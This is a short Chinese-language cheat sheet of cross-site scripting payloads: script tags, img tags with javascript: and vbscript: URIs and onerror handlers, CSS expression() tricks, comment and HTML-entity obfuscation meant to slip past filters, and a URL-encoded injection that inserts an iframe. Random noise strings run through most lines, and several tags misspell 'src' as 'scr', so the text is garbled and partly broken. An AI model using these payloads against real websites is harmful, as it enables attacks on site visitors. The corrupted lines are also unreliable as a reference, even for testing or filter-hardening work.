<script>alert("跨站")</script> (最常用)
9 P! B) P' B6 ~" l" n<img scr=javascript:alert("跨站")></img>
: c6 e! e+ ]* i* T: G; _<img scr="javascript: alert(/跨站/)></img>
6 `3 r( f G; D7 N2 q$ V* Q<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
" |9 Z* V, k7 g7 e0 v0 S* j0 x<img scr="#" onerror=alert(/跨站/)></img>( q y) [* s2 v# ^* @$ u
<img scr="#" style="xss:expression(alert(/xss/));"></img>" o* O5 V+ ?7 n& J
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
# ^- F& H) l% P* V4 e. ?2 U) N<img src=vbscript:msgbox ("xss")></img>
, K# ] Z$ L7 s/ d<style> input {left:expression (alert('xss'))}</style>
3 s3 W+ r: t. l# ]<div style={left:expression (alert('xss'))}></div>
3 B( ~4 i9 n. F4 u' C9 T* n<div style={left:exp/* */ression (alert('xss'))}></div>8 R* ^; P, D& Y& e: a: n; r" W, O
<div style={left:\0065\0078ression (alert('xss'))}></div>0 f1 z7 s7 B- W8 Y' y' F
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>9 \0 ?( J7 j& e0 ]
unicode <div style="{left:expRessioN (alert('xss'))}">
7 S5 k4 A. }( D# X* L8 f
8 m3 F5 a" d! z: ~"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
, N$ r5 {9 p( P$ W5 w! p |